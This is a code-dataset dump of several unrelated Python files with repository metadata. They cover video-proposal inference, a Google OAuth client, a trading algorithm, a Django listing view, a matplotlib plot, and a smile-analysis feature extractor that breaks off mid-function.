default='/nfs/bigbang/pratik18v/cse599/sst/data/c3d_pca/',
help='filepath for test dataset directory', type=str)
p.add_argument('-k', '--num_proposals', default=32,
help='Number of proposals generated at each timestep', type=int)
p.add_argument('-sl', '--seq_length', default=128,
help='Sequence length of each training instance', type=int)
p.add_argument('-dp', '--depth', default=1,
help='Number of recurrent layers in sequence encoder', type=int)
p.add_argument('-w', '--width', default=256,
help='Size of hidden state in each recurrent layer', type=int)
p.add_argument('-fd', '--feat-dim', default=500,
help='Dimension of c3d features', type=int)
p.add_argument('-drp', '--dropout', default=0.5,
help='Dropout probability', type=float)
p.add_argument('-v', '--verbose', default=False,
help='filename for output proposals', type=bool)
return p.parse_args()
def load_model(input_var=None, target_var=None, args=None, **kwargs):
model = SSTSequenceEncoder(input_var, target_var, seq_length=args.seq_length, depth=args.depth,
width=args.width, num_proposals=args.num_proposals, input_size=args.feat_dim, dropout=args.dropout,
mode='test')
return model
def main(args):
# build the model network and load with pre-trained parameters
input_var = T.tensor3('inputs')
sst_model = load_model(input_var=input_var, args=args)
sst_model.compile()
sst_model.load_model_params(args.model_params)
#Listing data files
fnames = []
video_ids = []
for fname in os.listdir(args.dataset):
if fname.split('_')[1] == 'test':
fnames.append(args.dataset + fname)
video_ids.append(fname.split('.')[0])
n_vid = len(video_ids)
proposals = [None] * n_vid
video_name = [None] * n_vid
for i, vid_name in enumerate(video_ids):
# process each video stream individually
data = sio.loadmat(fnames[i])
X_t = np.expand_dims(data['relu6'], axis=0)
# obtain proposals
y_pred = sst_model.forward_eval(X_t)
props_raw, scores_raw = get_segments(y_pred[0, :, :])
props, scores = nms_detections(props_raw, scores_raw, args.nms_thresh)
n_prop_after_pruning = scores.size
proposals[i] = np.hstack([
props, scores.reshape((-1, 1)),
np.zeros((n_prop_after_pruning, 1))])
video_name[i] = np.repeat([vid_name], n_prop_after_pruning).reshape(
n_prop_after_pruning, 1)
proposals_arr = np.vstack(proposals)
proposals_vid = np.vstack(video_name)
output_name = 'results_k{}.csv'.format(args.num_proposals)
output_file = os.path.join(args.output_dir, output_name)
df = pd.concat([
pd.DataFrame(proposals_arr, columns=['f-init', 'f-end', 'score',
'video-frames']),
pd.DataFrame(proposals_vid, columns=['video-name'])],
axis=1)
df.to_csv(output_file, index=None, sep=' ')
if args.verbose:
print('successful execution')
return 0
if __name__ == '__main__':
args = parse_args()
main(args)
| [
"pratik18v@gmail.com"
] | pratik18v@gmail.com |
7110b6154fe39eeffd7c02965d9e8c88a0b6f8ce | 2c084b3db7e5d27b0cce3fbf27a89b0de03bf552 | /liteauth/providers/google_oauth.py | a4d5ed04428af9c2ad185d08df600e8c3d04acb5 | [] | no_license | willkelly/liteauth | bd6c8f2a661414e4f91f2733e0545cd7a92c7026 | 9aebaf9ef472754492ea7df1a1c9b8904d39091d | refs/heads/master | 2021-01-22T06:28:41.812849 | 2014-03-13T11:17:06 | 2014-03-13T11:17:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,993 | py | from liteauth.providers.abstract_oauth import OauthClientInterface
from oauth import Client as OauthClient
class Client(OauthClientInterface):
    """Google OAuth2 client wrapper.

    Provides three alternate constructors:
    - create_for_redirect: build the authorization-redirect URL.
    - create_for_token: exchange an authorization code for tokens + userinfo.
    - create_for_refresh: exchange a refresh token for a fresh access token.
    """
    PREFIX = 'g_'

    def __init__(self, conf, redirect_url):
        """Read google_client_id/secret/scope from `conf`; raise ValueError if missing."""
        super(Client, self).__init__(redirect_url)
        self.google_client_id = conf.get('google_client_id')
        if not self.google_client_id:
            raise ValueError('google_client_id not set in config file')
        self.google_client_secret = conf.get('google_client_secret')
        if not self.google_client_secret:
            raise ValueError('google_client_secret not set in config file')
        self.google_scope = conf.get('google_scope')
        if not self.google_scope:
            raise ValueError('google_scope not set in config file')
        self.refresh_token = None

    @classmethod
    def create_for_redirect(cls, conf, redirect_url, state=None, approval_prompt='auto'):
        """Build a client whose `redirect` attribute is the Google auth URL."""
        gclient = cls(conf, redirect_url)
        c = OauthClient(auth_endpoint='https://accounts.google.com/o/oauth2/auth',
                        client_id=gclient.google_client_id,
                        redirect_uri=gclient.redirect_url)
        loc = c.auth_uri(scope=gclient.google_scope.split(','), access_type='offline',
                         state=state or '/', approval_prompt=approval_prompt)
        gclient.redirect = loc
        return gclient

    @classmethod
    def create_for_token(cls, conf, redirect_url, code):
        """Exchange the authorization `code` for tokens and fetch /userinfo."""
        gclient = cls(conf, redirect_url)
        c = OauthClient(token_endpoint='https://accounts.google.com/o/oauth2/token',
                        resource_endpoint='https://www.googleapis.com/oauth2/v1',
                        redirect_uri=gclient.redirect_url,
                        client_id=gclient.google_client_id,
                        client_secret=gclient.google_client_secret)
        c.request_token(code=code)
        gclient.access_token = c.access_token
        gclient.expires_in = c.expires_in
        if hasattr(c, 'refresh_token'):
            gclient.refresh_token = c.refresh_token
            # Bug fix: create_for_refresh takes (conf, redirect_url, rtoken);
            # the original call omitted redirect_url and raised TypeError.
            new_client = cls.create_for_refresh(conf, redirect_url, c.refresh_token)
            gclient.access_token = new_client.access_token
            gclient.expires_in = new_client.expires_in
        gclient.userinfo = c.request('/userinfo')
        return gclient

    @classmethod
    def create_for_refresh(cls, conf, redirect_url, rtoken):
        """Use a refresh token to obtain a new access token (no-op on error)."""
        gclient = cls(conf, redirect_url)
        c = OauthClient(token_endpoint='https://accounts.google.com/o/oauth2/token',
                        resource_endpoint='https://www.googleapis.com/oauth2/v1',
                        client_id=gclient.google_client_id,
                        client_secret=gclient.google_client_secret)
        error = c.request_token(grant_type='refresh_token',
                                refresh_token=rtoken)
        if not error:
            gclient.access_token = c.access_token
            gclient.expires_in = c.expires_in
        return gclient
| [
"constantine.peresypk@rackspace.com"
] | constantine.peresypk@rackspace.com |
085b458ef270d2c1acb8970e8d82e43ed77d7cf0 | 8b03dcd12a4a2a3856f2ec995b0d08a90ca3d6e2 | /LeveragedETFsWithSystematicRiskManagement.py | e9b8837f57b386ff0f44f40b8c138b1395f5db2d | [] | no_license | ZerounNet/StrategyLibraryQC | 1c1f13d2a7eadc96e0f223197e6d682cb521143f | b4fa0bfaab8ff650ee820cf807af36d267cf111f | refs/heads/main | 2023-07-12T23:55:36.063863 | 2021-08-18T21:46:41 | 2021-08-18T21:46:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 911 | py | from EtfSmaAlphaModel import EtfSmaAlphaModel
class ParticleQuantumChamber(QCAlgorithm):
def Initialize(self):
self.SetStartDate(2015, 6, 15)
self.SetEndDate(2020, 6, 15)
self.SetCash(100000)
self.sso = Symbol.Create('SSO', SecurityType.Equity, Market.USA) # SSO = 2x levered SPX
self.shy = Symbol.Create('SHY', SecurityType.Equity, Market.USA) # SHY = short term Treasury ETF
self.SetWarmup(200)
self.SetBenchmark('SPY')
self.UniverseSettings.Resolution = Resolution.Hour
self.SetAlpha(EtfSmaAlphaModel(self.sso, self.shy))
self.SetUniverseSelection(ManualUniverseSelectionModel([self.sso, self.shy]))
self.SetExecution(ImmediateExecutionModel())
self.SetBrokerageModel(AlphaStreamsBrokerageModel())
self.SetPortfolioConstruction(EqualWeightingPortfolioConstructionModel())
| [
"noreply@github.com"
] | ZerounNet.noreply@github.com |
ed93de707065f2b8a365587714ca37565801df90 | 6d395ffb748ac60733e9a5f039e2a307adae44d4 | /api/views_dir/xcx/page_group.py | ee7abc895b1e88940fd96cd77f904775668ab555 | [] | no_license | itcastpeng/hzWebSiteApi | 4f69c0f68dc78eebc4a5dad668d03e3c9d9c1d57 | f2bcd7a9ef28bf9c7f867e803f35d7b307d25527 | refs/heads/master | 2021-03-06T14:26:34.923464 | 2020-03-10T04:07:27 | 2020-03-10T04:07:27 | 246,204,894 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,787 | py |
from api import models
from publicFunc import Response
from publicFunc import account
from django.http import JsonResponse
from publicFunc.condition_com import conditionCom
from api.forms.xcx.page_group import SelectForm
import json
# @account.is_token(models.UserProfile)
def page_group(request):
    """Django view: paginated listing of PageGroup records with their pages.

    GET parameters (validated by SelectForm): current_page, length, plus
    optional filters handled by conditionCom and an `order` field
    (default '-create_datetime'). Returns a JSON envelope with code/msg/data.
    """
    response = Response.ResponseObj()
    if request.method == "GET":
        forms_obj = SelectForm(request.GET)
        if forms_obj.is_valid():
            current_page = forms_obj.cleaned_data['current_page']
            length = forms_obj.cleaned_data['length']
            print('forms_obj.cleaned_data -->', forms_obj.cleaned_data)
            order = request.GET.get('order', '-create_datetime')
            # Filterable fields; value is the ORM lookup suffix ('' = exact).
            field_dict = {
                'id': '',
                'template_id': '',
                'name': '__contains',
                'create_datetime': '',
            }
            q = conditionCom(request, field_dict)
            print('q -->', q)
            objs = models.PageGroup.objects.filter(q).order_by(order)
            count = objs.count()
            # length == 0 means "no pagination"; otherwise slice one page.
            if length != 0:
                start_line = (current_page - 1) * length
                stop_line = start_line + length
                objs = objs[start_line: stop_line]
            # Data to return
            ret_data = []
            default_page_id = None
            for obj in objs:
                # Fetch the pages belonging to this group
                page_objs = obj.page_set.all()
                page_data = []
                for page_obj in page_objs:
                    # Remember the very first page seen as the default page.
                    if not default_page_id:
                        default_page_id = page_obj.id
                    page_data.append({
                        'id': page_obj.id,
                        'name': page_obj.name
                    })
                # Append the queried row to the result list
                ret_data.append({
                    'id': obj.id,
                    'name': obj.name,
                    'page_data': page_data,
                    'create_datetime': obj.create_datetime.strftime('%Y-%m-%d %H:%M:%S'),
                })
            # Query succeeded: return status code 200
            response.code = 200
            response.msg = '查询成功'
            response.data = {
                'ret_data': ret_data,
                'data_count': count,
                'default_page_id': default_page_id,
            }
            response.note = {
                'id': "页面分组id",
                'name': '页面分组名称',
                'create_datetime': '创建时间',
            }
        else:
            # Form validation failed: surface the field errors.
            response.code = 402
            response.msg = "请求异常"
            response.data = json.loads(forms_obj.errors.as_json())
    return JsonResponse(response.__dict__)
| [
"15531506906@sina.cn"
] | 15531506906@sina.cn |
6385ed69753166db4476df0c19a64026ba1ca806 | 5fc69312ad6f9a84ef6d7fcb0eb933fe0751f822 | /day01/code/page21.py | f4ab90720990a5eb5e38507da38e24519c8797eb | [] | no_license | zhangjili/ShuhuFenxi | c1973a27915069f46844de1336076e7aa5fb2f40 | 822bf8633e6ea2bea39c97194c2d683838f2a910 | refs/heads/master | 2020-07-30T00:39:11.640012 | 2019-09-21T16:43:42 | 2019-09-21T16:43:42 | 210,021,407 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,143 | py | # coding=utf-8
from matplotlib import pyplot as plt
import random
import matplotlib
from matplotlib import font_manager
# windws和linux设置字体的放
# font = {'family' : 'MicroSoft YaHei',
# 'weight': 'bold',
# 'size': 'larger'}
# matplotlib.rc("font",**font)
# matplotlib.rc("font",family='MicroSoft YaHei',weight="bold")
# 另外一种设置字体的方式
my_font = font_manager.FontProperties(fname="D:\\迅雷下载\\2-1Q22FT622\\罗西钢笔行楷.ttf")
x = range(0, 120)
y = [random.randint(20, 35) for i in range(120)]
plt.figure(figsize=(20, 8), dpi=80)
plt.plot(x, y)
# 调整x轴的刻度
_xtick_labels = ["10点{}分".format(i) for i in range(60)]
_xtick_labels += ["11点{}分".format(i) for i in range(60)]
# 取步长,数字和字符串一一对应,数据的长度一样
plt.xticks(list(x)[::3], _xtick_labels[::3], rotation=45, fontproperties=my_font) # rotaion旋转的度数
# 添加描述信息
plt.xlabel("时间", fontproperties=my_font)
plt.ylabel("温度 单位(℃)", fontproperties=my_font)
plt.title("10点到12点每分钟的气温变化情况", fontproperties=my_font)
plt.show()
| [
"guangchang@tom.com"
] | guangchang@tom.com |
f921dad333bc6888e2dfb4562a8301606217b4bc | 871f682f14509323c796919a238988dd5360d36e | /if_else/last_number_7.py | 70649431a102d07b442182db01ff3160c8c78d45 | [] | no_license | shreshta2000/If-else_questions_ | c59242ff07c626875f981a5c83a6287bdade24e3 | f30f2100d6328367a3db92ef7ebf39db7e5f0107 | refs/heads/master | 2022-12-02T16:01:01.552430 | 2020-08-20T14:40:34 | 2020-08-20T14:40:34 | 289,026,245 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 118 | py | number=int(input("entre any number"))
if number%10==7:
print("last number is 7")
else:
print("last number is not 7") | [
"you@example.com"
] | you@example.com |
d58123b72969ccbd34331dda4d6b6903b5bede01 | b421b5422596d95626dffa920a4a55c841b1c6b9 | /spiderfarm/migrations/0002_zonefragment_imported.py | 70a5968323caa4a39d6e0cb0381a7f41c793cef3 | [] | no_license | mr-brick/spiderfarm-crm | 42a87c12e00f9c9c9de23411132ba9e308018529 | 687ea73d469c7b43be8956b67de14003cc8290a4 | refs/heads/master | 2022-04-06T00:08:31.261125 | 2020-03-05T10:14:43 | 2020-03-05T10:14:43 | 239,498,995 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 412 | py | # Generated by Django 2.2.3 on 2019-08-09 02:11
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add the boolean `imported` flag (default False) to ZoneFragment."""

    dependencies = [
        ('spiderfarm', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='zonefragment',
            name='imported',
            field=models.BooleanField(default=False, verbose_name='Imported'),
        ),
    ]
| [
"mrbrick1101@protonmail.com"
] | mrbrick1101@protonmail.com |
13b02b7cda7bdacf889392ac7824c6f6921a9691 | 4c77d7bf064b035e095b969e535aa95aad4d877e | /demo/features_extraction.py | 3faf17f68ba7399c50fea3ea24b449bb0b21be0c | [] | no_license | emavgl/discriminate-posed-spontaneous-smile | c0633fb4051196db83e2c331dc7866d66c04024e | de2d2ec0d3cb47b65228e0bf58f1500503903121 | refs/heads/master | 2021-07-06T12:07:21.797197 | 2017-09-29T22:31:34 | 2017-09-29T22:31:34 | 105,322,275 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26,353 | py | from PIL import Image, ImageDraw
import numpy as np
import sys, traceback
import os, glob, math
import re
import copy
import csv
from scipy.signal import medfilt
import operator
'''
features_extractions.py
input: folder with frontalized images and landmarks (.lm) file for each image
What it does:
Takes all the images inside the input directory and, for each image, gets the landmarks.
Using the landmarks, the script extracts the dlip and eyelid
using the formulas in the paper "Recognition of Genuine Smiles".
Then, it divides the functions (frame, dlip) and (frame, eyelid)
in temporal phases: onset, apex, offset and extracts the lip features (25)
and eye features (25).
'''
### HELPER FUNCTIONS
def atoi(text):
    """Convert *text* to int when it is purely numeric, else return it unchanged."""
    if text.isdigit():
        return int(text)
    return text
def safe_div(x, y):
    """Return x / y, or 0 when y == 0 (guards against ZeroDivisionError)."""
    return 0 if y == 0 else x / y
def natural_keys(text):
    """Sort key giving human/natural order (e.g. frame2 before frame10).

    Splits *text* on digit runs and converts each numeric chunk to int,
    so numeric parts compare numerically instead of lexicographically.
    See http://nedbatchelder.com/blog/200712/human_sorting.html
    """
    return [int(chunk) if chunk.isdigit() else chunk
            for chunk in re.split(r'(\d+)', text)]
def getMiddlePoint(p1, p2):
    """Return the midpoint of 2-D points p1 and p2, rounded to 2 decimals."""
    mid_x = round(float(p1[0] + p2[0]) / 2, 2)
    mid_y = round(float(p1[1] + p2[1]) / 2, 2)
    return (mid_x, mid_y)
def distance(p1, p2):
    """
    Input: two points (x, y), (x2, y2)
    Output: (float) Euclidean distance

    Uses math.hypot instead of the hand-rolled sqrt(dx**2 + dy**2):
    same result, but numerically safer against overflow/underflow.
    """
    x1, y1 = p1
    x2, y2 = p2
    return math.hypot(x1 - x2, y1 - y2)
def segmentize(xs, ys):
    """
    Divide the function into segments between consecutive samples.

    input:
    - xs is the array with all the x values of the function
    - ys is the array with the y values of the functions
    In our case: ys are the amplitudes, xs are the frames.
    output: amplitudes (list of per-segment deltas), speeds (list of deltas * fps)

    NOTE(review): relies on the module-level global `fps` being set by the
    CLI block at the bottom of the file before this is called.
    """
    points = list(zip(xs, ys))
    # Pair each point with its successor.
    list_1 = points[:-1]
    list_2 = points[1:]
    amplitudes = []
    speeds = []
    # iterate over couples of consecutive points
    for point1, point2 in zip(list_1, list_2):
        x1, y1 = point1
        x2, y2 = point2
        # speed = amplitude change per second (one segment spans 1/fps seconds)
        speed = float((y2 - y1))*fps
        amplitudes.append(y2 - y1)
        speeds.append(speed)
    return amplitudes, speeds
def division_kmeans(amplitudes):
    """
    Divide the function (frame, amplitudes) into 3 temporal phases
    (onset/apex/offset) using the k-means algorithm. Returns one cluster
    label per frame.
    """
    from sklearn.cluster import KMeans
    from sklearn import preprocessing
    f1 = range(1, len(amplitudes) + 1) # (x) frames
    f2 = amplitudes # (y) amplitudes
    X = np.matrix(list(zip(f1,f2)))
    standardized_X = preprocessing.scale(X)
    # since I want the distance of frames to be
    # more relevant than the second features (amplitudes)
    # I have to multiply, a weight, say 2, the second features
    standardized_X[:,0] *= 1.4
    standardized_X[:,1] *= 1
    # NOTE(review): standardized_X is computed and weighted above but KMeans is
    # fit on the raw, unscaled X — the scaling has no effect. Confirm intent.
    kmeans = KMeans(n_clusters=3, max_iter=500).fit(X)
    return kmeans.labels_.tolist()
def eyeLidAmplitude(p1, p2, upper_middle):
    """
    Calculate the eyelid amplitude.
    formula: distance(lower_middle, upper_middle) * vertical_location_function
    where lower_middle is the midpoint of p1 and p2, and the sign term makes
    the amplitude negative when the upper landmark falls below the lower one.
    """
    lower_middle = getMiddlePoint(p1, p2)
    x_upper_middle, y_upper_middle = upper_middle
    x_lower_middle, y_lower_middle = lower_middle
    vertical_location_function = 1
    # Check if the upper_middle stays below the lower_middle;
    # if so, set the vertical_location_function to -1.
    # (Image coordinates: larger y means lower on screen — TODO confirm.)
    if y_upper_middle > y_lower_middle: vertical_location_function = -1
    return distance(lower_middle, upper_middle)*vertical_location_function
def extractPoints(landmarks_file_path):
    """
    input: path of the file with landmarks.
    The landmark file has two rows: the first with "x" coordinates,
    the second with the "y" coordinates, space-separated.
    output: a 14-element list of (x, y) points in the layout used by the
    paper "Recognition of Genuine Smiles": indices 1-6 are eye landmarks,
    9-13 are nose/mouth/chin landmarks; slots 0, 7 and 8 are (0, 0) fillers.

    NOTE(review): the indices below presumably follow dlib's 68-point face
    layout (36-45 eyes, 30 nose, 48/54 mouth corners, 8 chin, 62 inner
    upper lip) — confirm against the landmark generator.
    """
    x_co = None
    y_co = None
    try:
        with open(landmarks_file_path, "r") as fo:
            x_co = (fo.readline()).split(" ")
            y_co = (fo.readline()).split(" ")
    except:
        # A missing/unreadable landmark file is fatal for the pipeline.
        print("Error: no lm file", landmarks_file_path)
        exit(-1)
    # parse to int (the trailing split element is an empty string, hence [:-1])
    x_co = [int(i) for i in x_co[:-1]]
    y_co = [int(i) for i in y_co[:-1]]
    indexes_to_get = [36, 37, 38, 39, 42, 43, 44, 45, 30, 48, 54, 8, 62]
    points = []
    for i in indexes_to_get:
        points.append((x_co[i], y_co[i]))
    return [(0, 0), points[0], getMiddlePoint(points[1], points[2]), points[3], points[4],
            getMiddlePoint(points[5], points[6]), points[7], (0, 0), (0, 0),
            points[8], points[9], points[10], points[11], points[12]]
def checkMax(li):
    """Return max(li), or 0 when the sequence is empty."""
    return max(li) if len(li) > 0 else 0
def checkMean(li):
    """Return the arithmetic mean of li (np.mean), or 0 when it is empty."""
    if len(li) == 0:
        return 0
    return np.mean(li)
# Definition of the functions
# - find_longest_positive_sequence
# - find_longest_negative_sequence
# This function are useful to divide the function in temporal segments
# The onset is the phase that starts from 0 and ends
# with the last frame of the longest positive sequence of segments
def find_longest_positive_sequence(arr, limit):
    """
    Return (first_index, last_index) of the longest run of consecutive
    positive segments that starts before `limit`.

    `last_index` is exclusive: it is the index of the first element after
    the run, matching how callers build frame ranges from it.

    A limit is specified because we only want positive runs that start
    before the longest negative run (the smile offset).

    Raises ValueError if no positive segment occurs before `limit`.
    """
    sequences = []
    indexes = []
    sequence = 0
    first_index = None
    for i, element in enumerate(arr):
        if element > 0 and i < limit:
            if first_index is None:
                first_index = i
            sequence += 1
        elif sequence > 0:
            # Close the current run; `i` is the first index past it.
            sequences.append(sequence)
            indexes.append((first_index, i))
            sequence = 0
            first_index = None
    # Bug fix: a run reaching the end of `arr` was previously dropped,
    # which made max(sequences) fail (or return a shorter run) when the
    # trailing run mattered.
    if sequence > 0:
        sequences.append(sequence)
        indexes.append((first_index, len(arr)))
    max_index = sequences.index(max(sequences))
    return indexes[max_index]
def find_longest_negative_sequence(arr):
    """
    Return (first_index, last_index) of the longest run of consecutive
    negative segments. `last_index` is exclusive (first element after the
    run), matching how callers build frame ranges from it.

    Raises ValueError if `arr` contains no negative segment.
    """
    sequences = []
    indexes = []
    sequence = 0
    first_index = None
    for i, element in enumerate(arr):
        if element < 0:
            if first_index is None:
                first_index = i
            sequence += 1
        elif sequence > 0:
            # Close the current run; `i` is the first index past it.
            sequences.append(sequence)
            indexes.append((first_index, i))
            sequence = 0
            first_index = None
    # Bug fix: a run reaching the end of `arr` was previously dropped.
    # That case is common here (a smile ending in its offset phase) and
    # made max(sequences) raise ValueError on an empty list.
    if sequence > 0:
        sequences.append(sequence)
        indexes.append((first_index, len(arr)))
    max_index = sequences.index(max(sequences))
    return indexes[max_index]
def extractFeatures(amplitudes, speeds, left_amplitude, right_amplitude):
    """
    Extract the 25 statistical features of one temporal phase.

    input:
    - amplitudes: list of segment amplitudes (dlip2 - dlip1) from segmentize
    - speeds: list of segment speeds
    - left_amplitude: list of left_amplitude segment values
    - right_amplitude: list of right_amplitude segment values

    Returns the 25-element feature list (durations, amplitudes, speeds,
    accelerations, symmetry) described in the paper.

    NOTE(review): relies on the module-level global `fps` set by the CLI
    block at the bottom of the file.
    """
    # Get the ascending_segments and descending segments
    # if the value of the segment is positive, is ascending
    ascending_segments, descending_segments = [i for i in amplitudes if i > 0 ], [j for j in amplitudes if j < 0]
    # Divides into ascending speeds and descending speeds
    speeds_asc, speeds_des = [i for i in speeds if i > 0 ], [j for j in speeds if j < 0]
    # Get the absolute values of the descending speeds
    speeds_des_abs = [abs(number) for number in speeds_des]
    # Get the absolute values of the descending segments
    descending_segments_abs = [abs(number) for number in descending_segments]
    # Gets the number of ascending and descending segments
    nascending = len(ascending_segments)
    ndescending = len(descending_segments)
    ntotal = nascending + ndescending
    # Gets the sum of ascending values and abs(descending) values
    sum_ascending = sum(ascending_segments)
    sum_descending = sum(descending_segments_abs)
    ### Duration ###
    # Description: duration of the ascendent, descendent, both phases
    # Formula: number_of_frames / frame_rate
    # since each segment is composed of two frames
    # the number of frames is n_segments*2
    # Output: duration = [duration+, duration-, duration_tot]
    ################
    durationP = float(nascending*2)/fps
    durationN = float(ndescending*2)/fps
    durationT = float(ntotal*2)/fps
    duration = [durationP, durationN, durationT]
    ### DurationRatio ###
    # Description: how many positive frames respect all the frames
    # Formula: number_of_segments_in_phase / number_of_all_segments
    # since each segment is composed of two frames
    # the number of frames is n_segments*2
    # but the *2 at the numerator and *2 at denominator
    # cancel out.
    # Output: durationRatio
    #####################
    durationRatioP = float(nascending)/ntotal
    durationRatioN = float(ndescending)/ntotal
    durationRatio = [durationRatioP, durationRatioN]
    ### max (value of a segment)
    # Description: max value of a segment
    # Formula: max(amplitudes)
    # Output: maximum
    ####################
    maximum = checkMax(amplitudes)
    ### mean
    # Description: mean value of the segments (all / ascending / |descending|)
    # Formula: mean(amplitudes)
    # Output: mean
    ####################
    meanA = checkMean(amplitudes)
    meanP = checkMean(ascending_segments)
    meanD = checkMean(descending_segments_abs)
    mean = [meanA, meanP, meanD]
    ### Standard Deviation
    # Description: standard deviation of the amplitude values
    # Formula: standard deviation, use degrees of freedom = 1 (sample std)
    # Output: std
    #####################
    std = np.std(amplitudes, ddof=1)
    ### Total Amplitude
    # Description: sum of the amplitude of the ascending and descending segments
    # Output: total_amplitude = [sumD+, sumD-]
    ####################
    total_amplitude = [sum_ascending, sum_descending]
    ### Net Amplitude
    # Description: difference of ascending's amplitude and descending's
    # Formula: sumD+ - sumD-
    ####################
    net_amplitude = sum_ascending - sum_descending
    ### Amplitude Ratio
    # Description: share of ascending (resp. descending) amplitude over total
    # Formula: sumD+ / (sumD+ + sumD-), and vice versa (0-safe via safe_div)
    ####################
    amplitude_ratio_asc = safe_div(sum_ascending, sum_ascending + sum_descending)
    amplitude_ratio_des = safe_div(sum_descending, sum_ascending + sum_descending)
    amplitude_ratio = [amplitude_ratio_asc, amplitude_ratio_des]
    ### Max speed
    # Description: get max speed
    # Formula: get both asc and desc speeds (abs), get the max
    # Output: max_speed
    ###################
    max_speed = [checkMax(speeds_asc), checkMax(speeds_des_abs)]
    ### Mean speed
    # Description: get mean speed
    # Formula: sum_of_speeds_asc / len(speeds_asc)
    # Output: mean_speed
    ####################
    mean_speed = [checkMean(speeds_asc), checkMean(speeds_des_abs)]
    ### Maximum Acceleration
    # How to calc acceleration: `speeds` contains the speeds of the segments,
    # speeds[0] is the speed of the movement from dlip(0) to dlip(1).
    # Acceleration formula: acceleration = (v2 - v1) / t.
    # We split accelerations between ascending (D+) and descending (D-)
    # phases; the chosen interpretation is: an acceleration belongs to the
    # ascending set when the *later* speed v2 is non-negative (i.e. the
    # movement is currently ascending), else to the descending set.
    # NOTE(review): values in acceleration_des can be of either sign, so
    # checkMax/checkMean on them are signed statistics — confirm this is
    # the intended definition.
    acceleration_asc = []
    acceleration_des = []
    list_1 = speeds[:-1]
    list_2 = speeds[1:]
    for v1, v2 in zip(list_1, list_2):
        acc = v2 - v1
        if v2 >= 0:
            acceleration_asc.append(acc)
        else:
            acceleration_des.append(acc)
    max_acceleration = [checkMax(acceleration_asc), checkMax(acceleration_des)]
    ### Mean Acceleration
    # Description: mean of the acceleration values per phase
    # Formula: np.mean
    # Output: mean_acceleration
    ###########################
    mean_acceleration = [checkMean(acceleration_asc), checkMean(acceleration_des)]
    ### Net. Amplitude Duration Ratio
    # Formula: (sum D+ - sum |D-|) * fps / len(D)
    # Output: Amplitude Duration Ratio
    ###########################
    net_amplitude_ratio = ((sum_ascending - sum_descending)*fps)/ ntotal
    ### Left/Right Amplitude Difference
    # Description: asymmetry between the left and right side of the face
    # Formula: abs(sum(left_amplitude) - sum(right_amplitude)) / ntotal
    # Output: left_right_amplitude_diff
    ###########################
    left_right_amplitude_diff = abs(sum(left_amplitude) - sum(right_amplitude)) / ntotal
    # Aggregate all features in a single list (25 features in total).
    # NOTE(review): the intermediate lists duration/durationRatio/mean/
    # total_amplitude/amplitude_ratio/max_speed/mean_speed/max_acceleration/
    # mean_acceleration are unused below (the components are re-listed
    # individually) — kept for documentation/debugging parity with the paper.
    features_set = [durationP, durationN, durationT, durationRatioP, durationRatioN,
                    maximum, meanA, meanP, meanD, std, sum_ascending, sum_descending,
                    net_amplitude, amplitude_ratio_asc, amplitude_ratio_des,
                    checkMax(speeds_asc), checkMax(speeds_des_abs), checkMean(speeds_asc), checkMean(speeds_des_abs),
                    checkMax(acceleration_asc), checkMax(acceleration_des), checkMean(acceleration_asc),
                    checkMean(acceleration_des), net_amplitude_ratio, left_right_amplitude_diff]
    return features_set
def writeCSV(features, features_name, input_folder):
    """
    Write `features` as a single CSV row to
    `<input_folder>/<folder_name>.<features_name>.csv`, where `folder_name`
    is the last path component of `input_folder` (which must end with '/').
    """
    folder_name = input_folder.split('/')[-2]
    target = '{}{}.{}.csv'.format(input_folder, folder_name, features_name)
    with open(target, "w") as handle:
        csv.writer(handle).writerow(features)
def extractDlipFeaturesFromFolder(input_folder):
    """
    Extract lip landmarks and use them to compute the dlip signal over all
    frames. Given the function (frame, dlip), it first divides the smile
    into temporal phases (onset/apex/offset) and then extracts the 25 lip
    features per phase (75 total).

    Returns (labels, totalFeaturesSet) where `labels` assigns each frame
    its phase index (reused later for the eyelid features) and
    `totalFeaturesSet` is onset + apex + offset feature lists concatenated.

    Two phase-division strategies are tried: the paper's longest-run method
    first, then a k-means fallback (or vice versa) if the first raises;
    after two failures the error is re-raised.
    """
    # get the list of all the landmarks files
    search_model = input_folder + "*.lm"
    file_list = glob.glob(search_model)
    # sort file_list in natural order (frame2 before frame10)
    file_list.sort(key=natural_keys)
    # extract points from the first frame (neutral-face reference)
    first_frame = input_folder + "frame0.jpg.lm"
    landmarks = extractPoints(first_frame)
    f_central_point = landmarks[13]
    f_l10 = landmarks[10]
    f_l11 = landmarks[11]
    # for each file in the list, extract l10, l11
    # and central point of the mouth;
    # calculate dlip and save it in the list "amplitudes"
    amplitudes = []
    left_amplitudes = []
    right_amplitudes = []
    for f in file_list:
        landmarks = extractPoints(f)
        central_point = landmarks[13]
        l10 = landmarks[10]
        l11 = landmarks[11]
        right_amplitude = distance(f_central_point, l10)
        left_amplitude = distance(f_central_point, l11)
        dlip = right_amplitude + left_amplitude
        # normalize by twice the reference mouth width
        dlip = float(dlip) / (2*distance(f_l10, f_l11))
        amplitudes.append(dlip)
        left_amplitudes.append(left_amplitude)
        right_amplitudes.append(right_amplitude)
    # apply smoothing median filter (window 5) to de-noise the signals
    amplitudes = medfilt(amplitudes, 5)
    left_amplitudes = medfilt(left_amplitudes, 5)
    right_amplitudes = medfilt(right_amplitudes, 5)
    # segmentize the smoothed amplitude curve
    seg_amplitudes, speed = segmentize(range(len(amplitudes)), amplitudes)
    # Choose the phase-division algorithm ('paper' first, k-means fallback)
    algorithm_to_use = 'paper'
    tries = 0
    while True:
        try:
            if 'paper' == algorithm_to_use:
                # Method 1 - Paper like: onset = up to the end of the longest
                # positive run; offset = from the start of the longest
                # negative run; apex = everything in between.
                max_negative_sequence = find_longest_negative_sequence(seg_amplitudes)
                limit = max_negative_sequence[0]
                max_positive_sequence = find_longest_positive_sequence(seg_amplitudes, limit)
                onset_indexes = (0, max_positive_sequence[1])
                offset_indexes = (max_negative_sequence[0], len(seg_amplitudes) + 1)
                onset_frames = range(onset_indexes[0], onset_indexes[1])
